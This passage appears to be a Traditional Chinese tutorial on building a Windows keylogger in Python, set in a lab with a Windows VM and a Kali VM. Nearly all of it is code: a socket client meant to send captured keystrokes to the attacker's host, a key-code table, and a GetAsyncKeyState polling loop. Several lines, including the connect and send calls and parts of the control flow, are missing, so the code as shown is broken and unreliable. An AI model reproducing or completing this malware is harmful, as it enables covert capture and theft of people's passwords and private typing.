首先我們會需要電腦直接產生連線,所以我們會需要我們的 keylogger 持續的將紀錄下來的內容傳給駭客的主機,那我們可以利用 python 的 socket 套件來達到這項功能,對,就是那個可以拿來寫 DDos 的 socket
那在這個練習的環境中,我們會利用 windows 的虛擬機跟我們的 kali vm 產生連線
# Set the server address and port
serverAddress = ('', 9000)
# Create a TCP/IP socket
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the server
def getKey(code):
# ASCII table for special and regular keys
asciiTable = {
"0": "[NUL]", "1": "[LCLICK]", "2": "[RCLICK]", "3": "[ETX]", "4": "[SCROLLCLICK]",
"5": "[ENQ]", "6": "[ACK]", "7": "[BEL]", "8": "[BACKSPACE]", "9": "[TAB]",
"10": "[LF]", "11": "[VT]", "12": "[CLEAR]", "13": "[ENTER]", "14": "[SO]", "15": "[SI]",
"16": "", "17": "[RALT]", "18": "[LALT]", "19": "[PAUSEBREAK]", "20": "[CAPSLOCK]",
"21": "[NAK]", "22": "[SYN]", "23": "[ETB]", "24": "[CAN]", "25": "[EM]",
"26": "[SUB]", "27": "[ESC]", "28": "[FS]", "29": "[GS]", "30": "[RS]",
"31": "[US]", "32": "[SPACE]", "33": "[PAGEUP]", "34": "[PAGEDOWN]", "35": "[END]",
"36": "[HOME]", "37": "[LEFT]", "38": "[UP]", "39": "[RIGHT]", "40": "[DOWN]",
"41": ")", "42": "*", "43": "+", "44": "[PRTSC]", "45": "[INSERT]",
"46": "[DELETE]", "47": "/", "48": "0", "49": "1", "50": "2",
"51": "3", "52": "4", "53": "5", "54": "6", "55": "7",
"56": "8", "57": "9", "58": ":", "59": ";", "60": "<",
"61": "=", "62": ">", "63": "?", "64": "@", "65": "A",
"66": "B", "67": "C", "68": "D", "69": "E", "70": "F",
"71": "G", "72": "H", "73": "I", "74": "J", "75": "K",
"76": "L", "77": "M", "78": "N", "79": "O", "80": "P",
"81": "Q", "82": "R", "83": "S", "84": "T", "85": "U",
"86": "V", "87": "W", "88": "X", "89": "Y", "90": "Z",
"91": "[WIN]", "92": "\\", "93": "]", "94": "^", "95": "_",
"96": "0", "97": "1", "98": "2", "99": "3", "100": "4",
"101": "5", "102": "6", "103": "7", "104": "8", "105": "9",
"106": "*", "107": "+", "108": "l", "109": "-", "110": ".",
"111": "/", "112": "[F1]", "113": "[F2]", "114": "[F3]", "115": "[F4]",
"116": "[F5]", "117": "[F6]", "118": "[F7]", "119": "[F8]", "120": "[F9]",
"121": "[F10]", "122": "[F11]", "123": "[F12]", "124": "|", "125": "}",
"126": "~", "145": "[SCROOLLOCK]", "144": "[NUMLOCK]", "160": "[LSHIFT]", "161": "[RSHIFT]",
"162": "[LCTRL]", "163": "[RCTRL]", "190": ".", "191": "/", "188": ",",
"186": ";", "189": "-", "187": "=", "165": "", "164": "",
"192": "`", "222": "'", "220": "\\", "219": "[", "221": "]"
# Return the key name from the ASCII table
return asciiTable[code]
except KeyError:
# Return an empty string if the key is not in the table
return ""
所有的 code 如下
import socket # Import the socket module for networking
import ctypes # Import ctypes to access Windows API for keyboard state
import time # Import time for sleep functionality
# Set the server address and port
serverAddress = ('', 9000)
# Create a TCP/IP socket
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the server
# Load user32.dll for Windows API calls
user32 = ctypes.windll.user32
# Function to get the readable key name from the key code
def getKey(code):
# ASCII table for special and regular keys
asciiTable = {
"0": "[NUL]", "1": "[LCLICK]", "2": "[RCLICK]", "3": "[ETX]", "4": "[SCROLLCLICK]",
"5": "[ENQ]", "6": "[ACK]", "7": "[BEL]", "8": "[BACKSPACE]", "9": "[TAB]",
"10": "[LF]", "11": "[VT]", "12": "[CLEAR]", "13": "[ENTER]", "14": "[SO]", "15": "[SI]",
"16": "", "17": "[RALT]", "18": "[LALT]", "19": "[PAUSEBREAK]", "20": "[CAPSLOCK]",
"21": "[NAK]", "22": "[SYN]", "23": "[ETB]", "24": "[CAN]", "25": "[EM]",
"26": "[SUB]", "27": "[ESC]", "28": "[FS]", "29": "[GS]", "30": "[RS]",
"31": "[US]", "32": "[SPACE]", "33": "[PAGEUP]", "34": "[PAGEDOWN]", "35": "[END]",
"36": "[HOME]", "37": "[LEFT]", "38": "[UP]", "39": "[RIGHT]", "40": "[DOWN]",
"41": ")", "42": "*", "43": "+", "44": "[PRTSC]", "45": "[INSERT]",
"46": "[DELETE]", "47": "/", "48": "0", "49": "1", "50": "2",
"51": "3", "52": "4", "53": "5", "54": "6", "55": "7",
"56": "8", "57": "9", "58": ":", "59": ";", "60": "<",
"61": "=", "62": ">", "63": "?", "64": "@", "65": "A",
"66": "B", "67": "C", "68": "D", "69": "E", "70": "F",
"71": "G", "72": "H", "73": "I", "74": "J", "75": "K",
"76": "L", "77": "M", "78": "N", "79": "O", "80": "P",
"81": "Q", "82": "R", "83": "S", "84": "T", "85": "U",
"86": "V", "87": "W", "88": "X", "89": "Y", "90": "Z",
"91": "[WIN]", "92": "\\", "93": "]", "94": "^", "95": "_",
"96": "0", "97": "1", "98": "2", "99": "3", "100": "4",
"101": "5", "102": "6", "103": "7", "104": "8", "105": "9",
"106": "*", "107": "+", "108": "l", "109": "-", "110": ".",
"111": "/", "112": "[F1]", "113": "[F2]", "114": "[F3]", "115": "[F4]",
"116": "[F5]", "117": "[F6]", "118": "[F7]", "119": "[F8]", "120": "[F9]",
"121": "[F10]", "122": "[F11]", "123": "[F12]", "124": "|", "125": "}",
"126": "~", "145": "[SCROOLLOCK]", "144": "[NUMLOCK]", "160": "[LSHIFT]", "161": "[RSHIFT]",
"162": "[LCTRL]", "163": "[RCTRL]", "190": ".", "191": "/", "188": ",",
"186": ";", "189": "-", "187": "=", "165": "", "164": "",
"192": "`", "222": "'", "220": "\\", "219": "[", "221": "]"
# Return the key name from the ASCII table
return asciiTable[code]
except KeyError:
# Return an empty string if the key is not in the table
return ""
# Main function to capture and send keystrokes
def main():
# Dictionary to store the state of each key
keyStates = {}
while True:
# Iterate through all possible key codes (0-255)
for i in range(256):
# Check if the key is pressed
if user32.GetAsyncKeyState(i) & 0x8000 != 0:
# If the key was not previously pressed
if keyStates.get(i, False) == False:
keyStates[i] = True # Update the state to pressed
key = getKey(str(i)) # Get the readable key name
# Check if Caps Lock is off and convert to lowercase if needed
if user32.GetKeyState(0x14) & 0x0001 == 0:
key = key.lower()
# Send the key code to the server
# Update the state to not pressed
keyStates[i] = False
# Sleep for 10 milliseconds to reduce CPU usage
# Run the main function if the script is executed directly
if __name__ == "__main__":